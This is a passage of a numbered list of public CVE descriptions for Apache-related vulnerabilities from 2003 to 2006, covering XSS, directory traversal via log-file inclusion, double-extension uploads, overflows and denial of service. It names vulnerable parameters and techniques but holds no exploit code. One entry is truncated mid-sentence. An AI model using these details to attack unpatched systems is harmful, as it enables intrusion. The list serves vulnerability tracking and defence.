14188| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
14189| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
14190| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
14191| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
14192| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
14193| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in Welcome web-app.
14194| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
14195| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
14196| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
14197| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
14198| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
14199| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
14200| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
14201| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
14202| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
14203| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
14204| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
14205| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
14206| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
14207| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
14208| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
14209| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
14210| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
14211| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
14212| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
14213| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
14214| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
14215| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
14216| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
14217| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
14218| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
14219| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
14220| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
14221| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
14222| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
14223| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
14224| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
14225| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
14226| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
14227| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
14228| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
14229| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
14230| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
14231| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
14232| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
14233| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
14234| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
14235| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
14236| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
14237| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
14238| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
14239| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
14240| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers to cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
14241| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
14242| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
14243| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
14244| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
14245| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
14246| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
14247| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
14248| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
14249| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
14250| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
14251| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
14252| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
14253| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
14254| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
14255| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
14256| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
14257| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
14258| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
14259| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
14260| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
14261| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
14262| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
14263| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
14264| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
14265| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
14266| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
14267| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
14268| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
14269| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
14270| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
14271| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
14272| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
14273| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
14274| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
14275| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
14276| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
14277| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
14278| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
14279| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
14280| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
14281| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
14282| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
14283| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
14284| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
14285| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
14286| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
14287| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
14288| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
14289| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
14290| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
14291| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
14292| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
14293| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
14294| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
14295| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
14296| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
14297| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
14298| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
14299| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
14300| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
14301| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
14302| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
14303| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
14304| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
14305| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
14306| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
14307| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
14308| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
14309| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
14310| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child process IDs (PID).
14311| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
14312| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
14313| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
